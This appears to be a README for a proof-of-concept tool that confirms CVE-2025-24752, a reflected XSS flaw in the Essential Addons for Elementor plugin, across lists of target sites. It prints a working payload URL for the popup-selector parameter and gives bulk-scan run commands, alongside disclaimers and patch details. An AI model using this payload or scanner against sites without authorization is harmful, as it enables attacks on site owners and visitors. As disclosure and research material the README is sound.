This tool is for security research and patching purposes only. Do not use it to harm sites. If you find vulnerable sites, report them responsibly to site owners so they can update immediately.
A reflected XSS vulnerability in Essential Addons for Elementor affects over 100K+ websites using versions below 6.0.15. This has been assigned CVE-2025-24752.
https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1
pip install selenium webdriver-managerpython poc.py targets.txt- 100% Accurate Detection: Unlike nuclei or httpx tools, this script confirms XSS by actually loading the vulnerable page in a browser and witnessing the alert execution
- Bulk Scanning: Can process multiple targets (note: will be slower due to browser-based confirmation)
- Perfect Detection: Nuclei template included for plugin detection in assets
A perfect detection template for the plugin in assets is included: detect-elementor-for-xss.yaml
The vulnerability occurs due to insufficient validation and sanitizing of the popup-selector query argument, allowing a malicious value to be reflected back at the user. Fixed in version 6.0.15.
For more details: Patchstack Article
This tool is provided for educational and protective purposes only. Always obtain proper authorization before testing any website for vulnerabilities. The author is not responsible for misuse of this tool.
Thanks to responsible security researchers who identified and reported this vulnerability.